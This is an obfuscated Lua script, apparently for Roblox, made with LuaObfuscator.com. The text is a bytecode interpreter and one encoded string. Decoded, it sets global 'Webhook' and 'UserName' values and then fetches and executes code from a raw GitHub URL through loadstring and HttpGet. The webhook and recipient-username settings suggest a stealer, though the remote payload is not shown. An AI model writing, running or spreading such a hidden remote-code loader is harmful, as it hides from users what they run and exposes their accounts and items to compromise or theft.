--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v68=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -(1 + 0)))) + (620 -(555 + 64)))) ;return v68-(v68%(1 + 0)) ;else local v69=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v69 + v69))>=v69) and (928 -(214 + 713))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((1945 -(68 + 997)) -(282 + (1865 -(226 + 1044)))) );v19=v19 + 4 ;return (v37 * (16778853 -(1523 + 114))) + (v36 * (58895 + 6641)) + (v35 * ((1584 -1220) -108)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==(2 -1)) then v41=nil;v42=nil;v38=2;end if (v38==(8 -4)) then while true do if (v39~=(0 -0)) then else local v96=74 -(71 + 3) ;while true do if (v96~=(0 + 0)) then else v40=0 -0 ;v41=nil;v96=1;end if (v96==(2 -1)) then v39=1;break;end end end if (1~=v39) then else local v97=0 -0 ;while true do if (v97~=(242 -(187 + 54))) then else v39=2;break;end if (v97==(780 -(162 + 618))) then local v105=0 + 0 ;while true do if (v105==(753 -(239 + 514))) then v42=nil;v43=nil;v105=1 + 0 ;end if (v105==(1330 -(797 + 532))) then v97=1 -0 ;break;end end end end end if (v39~=(2 -0)) then else local v98=0 + 0 ;while true do if (v98==(1636 -(1373 + 263))) then v44=nil;v45=nil;v98=1001 -(451 + 549) ;end if (v98~=(1 + 0)) then else v39=4 -1 ;break;end end end if (v39==(4 -1)) then v46=nil;while true do local v99=1384 -(746 + 638) ;local v100;while true do if (0~=v99) then else v100=0 + 0 ;while true do if (v100==(1202 -(373 + 829))) then local v106=0;while true do if (v106==(0 -0)) then if (v40~=(343 -(218 + 123))) then else local v152=731 -(476 + 255) ;local v153;while true do if ((1581 -(1535 + 46))==v152) then v153=0 + 0 ;while true do local v171=0 -0 ;local v172;while true do if (v171==(0 + 0)) then v172=238 -(64 + 174) ;while true do if ((560 -(306 + 254))==v172) then if (v153~=(1 + 0)) then else return v44;end if (v153~=(0 -0)) then else for v177=1,v24() do local v178=0;local v179;local v180;local v181;while true do if (v178==(336 -(144 + 192))) then v179=1467 -(899 + 568) ;v180=nil;v178=1;end if (v178==(1 + 0)) then v181=nil;while true do if (v179==(0 -0)) then local v189=0;while true do if ((603 -(268 + 335))==v189) then v180=0;v181=nil;v189=1 + 0 ;end if (v189==(291 -(60 + 230))) then v179=573 -(426 + 146) ;break;end end end if (v179==(1 + 0)) then while true do if (v180~=(1456 -(282 + 1174))) then else v181=v22();if (v21(v181,1,1)==(811 -(569 + 242))) then local v192=0;local v193;local v194;local v195;local v196;local v197;while true do if (v192==(0 -0)) then v193=0 -0 ;v194=nil;v192=1 + 0 ;end if (v192==(1025 -(706 + 318))) then v195=nil;v196=nil;v192=2;end if (v192==(1253 -(721 + 530))) then v197=nil;while true do if (v193==2) then while true do if (v194~=(1975 -(1913 + 62))) then else local v200=1271 -(945 + 326) ;local v201;while true do if ((0 -0)==v200) then v201=0;while true do if (v201~=1) then else v194=1 + 0 ;break;end if (v201==(700 -(271 + 429))) then local v212=0 + 0 ;while true do if (v212~=(1933 -(565 + 1368))) then else v195=v21(v181,7 -5 ,1503 -(1408 + 92) );v196=v21(v181,5 -1 ,6);v212=1087 -(461 + 625) ;end if (1==v212) then v201=1289 -(993 + 295) ;break;end end end end break;end end end if (v194==(2 -0)) then local v202=0 + 0 ;while true do if (v202~=1) then else v194=1174 -(418 + 753) ;break;end if (v202==(0 + 0)) then if (v21(v196,1,1 + 0 )==(1 + 0)) then v197[1 + 1 ]=v46[v197[1003 -(938 + 63) ]];end if (v21(v196,1 + 1 ,531 -(406 + 123) )~=(1 + 0)) then else v197[3]=v46[v197[3]];end v202=1770 -(1749 + 20) ;end end end if (v194==(1 + 2)) then if (v21(v196,3,1325 -(1249 + 73) )==(1139 -(782 + 356))) then v197[2 + 2 ]=v46[v197[1149 -(466 + 679) ]];end v41[v177]=v197;break;end if (v194~=(2 -1)) then else local v204=0;local v205;while true do if (0~=v204) then else v205=0 -0 ;while true do if (v205==0) then local v213=0;while true do if (v213==0) then v197={v23(),v23(),nil,nil};if (v195==(0 + 0)) then local v214=0;local v215;local v216;while true do if (v214==(0 -0)) then v215=0 -0 ;v216=nil;v214=1;end if (v214~=(1019 -(697 + 321))) then else while true do if (v215==(0 -0)) then v216=0 -0 ;while true do if (v216~=(0 -0)) then else v197[2 + 1 ]=v23();v197[4]=v23();break;end end break;end end break;end end elseif (v195==(115 -(4 + 110))) then v197[3]=v24();elseif (v195==(586 -(57 + 527))) then v197[3]=v24() -((1229 -(322 + 905))^(627 -(602 + 9))) ;elseif (v195==(1430 -(41 + 1386))) then local v219=103 -(17 + 86) ;local v220;while true do if (v219==(872 -(826 + 46))) then v220=0 + 0 ;while true do if (v220==(0 -0)) then v197[1 + 2 ]=v24() -((1900 -(260 + 1638))^(456 -(382 + 58))) ;v197[4]=v23();break;end end break;end end end v213=3 -2 ;end if (v213~=(1 + 0)) then else v205=1;break;end end end if (v205==(2 -1)) then v194=5 -3 ;break;end end break;end end end end break;end if (v193==(167 -(122 + 44))) then local v198=0;while true do if (v198==(1 -0)) then v193=6 -4 ;break;end if (v198==0) then v196=nil;v197=nil;v198=1 -0 ;end end end if (v193==(0 + 0)) then local v199=0;while true do if (v199~=(0 + 0)) then else v194=0 + 0 ;v195=nil;v199=1691 -(1121 + 569) ;end if (v199~=(1 -0)) then else v193=66 -(30 + 35) ;break;end end end end break;end end end break;end end break;end end break;end end end for v182=1,v24() do v42[v182-(1 + 0) ]=v29();end v153=1258 -(1043 + 214) ;end break;end end break;end end end break;end end end if ((3 -2)==v40) then local v154=1212 -(323 + 889) ;local v155;local v156;while true do if ((0 -0)~=v154) then else v155=0 -0 ;v156=nil;v154=581 -(361 + 219) ;end if (v154==(1 -0)) then while true do if (v155~=(320 -(53 + 267))) then else v156=0;while true do if (v156==(0 + 0)) then local v173=413 -(15 + 398) ;while true do if (v173==1) then v156=983 -(18 + 964) ;break;end if (v173~=0) then else v45=v24();v46={};v173=3 -2 ;end end end if (v156~=1) then else local v174=0;while true do if (v174==(0 -0)) then for v184=3 -2 ,v45 do local v185=0 -0 ;local v186;local v187;local v188;while true do if (v185==(0 + 0)) then v186=0 + 0 ;v187=nil;v185=237 -(141 + 95) ;end if (v185==(1 + 0)) then v188=nil;while true do if (0~=v186) then else local v190=0 + 0 ;while true do if (v190==(850 -(20 + 830))) then v187=v22();v188=nil;v190=2 -1 ;end if ((1 + 0)==v190) then v186=1;break;end end end if (1~=v186) then else if (v187==(127 -(116 + 10))) then v188=v22()~=(0 + 0) ;elseif (v187==2) then v188=v25();elseif (v187==(741 -(542 + 196))) then v188=v26();end v46[v184]=v188;break;end end break;end end end v44[3 + 0 ]=v22();v174=1 + 0 ;end if ((1 -0)~=v174) then else v156=2;break;end end end if (v156==(3 -1)) then v40=1 + 1 ;break;end end break;end end break;end end end v106=1 + 0 ;end if (v106==(1 + 0)) then v100=1 -0 ;break;end end end if (v100==(766 -(574 + 191))) then if (v40~=(0 -0)) then else local v124=0 -0 ;local v125;while true do if (v124~=0) then else v125=1551 -(1126 + 425) ;while true do if ((407 -(118 + 287))==v125) then v40=1;break;end if (v125==(850 -(254 + 595))) then v43={};v44={v41,v42,nil,v43};v125=5 -3 ;end if (v125~=(377 -(142 + 235))) then else local v169=0;local v170;while true do if (v169==0) then v170=0 -0 ;while true do if (v170~=(0 + 0)) then else local v175=977 -(553 + 424) ;while true do if (v175==(0 -0)) then v41={};v42={};v175=1;end if (v175==(1 + 0)) then v170=1 -0 ;break;end end end if ((940 -(714 + 225))==v170) then v125=1 + 0 ;break;end end break;end end end end break;end end end break;end end break;end end end break;end end break;end if (v38~=(0 + 0)) then else v39=0 -0 ;v40=nil;v38=1 + 0 ;end if (v38~=(2 -0)) then else v43=nil;v44=nil;v38=2 + 1 ;end if (v38==(809 -(118 + 688))) then v45=nil;v46=nil;v38=4;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1 + 0 ;local v50=(v21(v48,49 -(25 + 23) ,2 + 2 + 16 ) * ((1888 -(927 + (1296 -(10 + 327))))^(107 -75))) + v47 ;local v51=v21(v48,(525 + 228) -(16 + 716) ,119 -88 );local v52=((v21(v48,891 -(240 + 619) )==(1 + 0)) and  -(1 -0)) or (98 -(11 + 86)) ;if (v51==(0 -0)) then if (v50==(285 -(175 + 110))) then return v52 * ((743 -(118 + 220)) -(85 + 170 + 150)) ;else v51=2 -1 ;v49=0 -0 ;end elseif (v51==(3843 -(503 + 1293))) then return ((v50==(0 -0)) and (v52 * (((450 -(108 + 341)) + 0)/0))) or (v52 * NaN) ;end return v8(v52,v51-(1429 -(183 + 223)) ) * (v49 + (v50/((1063 -(810 + 251))^(37 + 15)))) ;end v26=nil;function v26(v53)local v54=0 + 0 ;local v55;local v56;while true do if ((8 -6)==v54) then v56={};for v75=1494 -(711 + 782) , #v55 do v56[v75]=v2(v1(v3(v55,v75,v75)));end v54=3;end if (v54==(1 -0)) then v55=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;v54=2 + 0 ;end if (v54==((17 + 455) -(270 + 199))) then return v6(v56);end if (v54==(0 + 0)) then v55=nil;if  not v53 then v53=v24();if (v53==(1819 -(580 + 1239))) then return "";end end v54=(1 + 1) -1 ;end end end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (4 -2) );v19=v19 + 2 + 0 ;return (v59 * (1423 -(645 + 522))) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v60,1,1));return "";end end else local v71=v2(v0(v60,16));if v20 then local v77=0;local v78;while true do if (v77==1) then return v78;end if (v77==0) then v78=v5(v71,v20);v20=nil;v77=1;end end else return v71;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92==0) then v89[v91[2]]();else local v107=v91[2];v89[v107]=v89[v107](v13(v89,v107 + 1 ,v84));end elseif (v92<=2) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92==3) then v89[v91[2]]=v91[3];else v83=v91[3];end elseif (v92<=7) then if (v92<=5) then do return;end elseif (v92>6) then v89[v91[2]][v91[3]]=v91[4];else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=8) then v89[v91[2]]();elseif (v92>9) then v89[v91[2]]=v63[v91[3]];else v89[v91[2]]=v63[v91[3]];end elseif (v92<=15) then if (v92<=12) then if (v92==11) then local v109=0;local v110;local v111;local v112;local v113;while true do if (v109==1) then v84=(v112 + v110) -1 ;v113=0;v109=2;end if (v109==2) then for v149=v110,v84 do local v150=0;while true do if (v150==0) then v113=v113 + 1 ;v89[v149]=v111[v113];break;end end end break;end if (v109==0) then v110=v91[2];v111,v112=v82(v89[v110](v13(v89,v110 + 1 ,v91[3])));v109=1;end end else local v114=v91[2];local v115,v116=v82(v89[v114](v13(v89,v114 + 1 ,v91[3])));v84=(v116 + v114) -1 ;local v117=0;for v121=v114,v84 do v117=v117 + 1 ;v89[v121]=v115[v117];end end elseif (v92<=13) then do return;end elseif (v92==14) then local v137=v91[2];v89[v137]=v89[v137](v13(v89,v137 + 1 ,v84));else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=18) then if (v92<=16) then v89[v91[2]]=v91[3];elseif (v92==17) then local v140=0;local v141;local v142;while true do if (v140==1) then v89[v141 + 1 ]=v142;v89[v141]=v142[v91[4]];break;end if (v140==0) then v141=v91[2];v142=v89[v91[3]];v140=1;end end else local v143=0;local v144;local v145;while true do if (v143==1) then v89[v144 + 1 ]=v145;v89[v144]=v145[v91[4]];break;end if (v143==0) then v144=v91[2];v145=v89[v91[3]];v143=1;end end end elseif (v92<=19) then v83=v91[3];elseif (v92>20) then v89[v91[2]][v91[3]]=v91[4];elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end v83=v83 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D6532001F3O0012103O00013O0026023O000E00010002002O043O000E000100120A000100033O00301500010004000500120A000100063O00120A000200073O002012000200020008001210000400094O0006000500014O000C000200054O000E00013O00024O000100010001002O043O001E00010026023O000100010001002O043O00010001001210000100013O0026020001001800010001002O043O0018000100120A000200033O0030150002000A000500120A000200033O0030150002000B0005001210000100023O0026020001001100010002002O043O001100010012103O00023O002O043O00010001002O043O00110001002O043O000100012O00053O00017O00",v9(),...);end
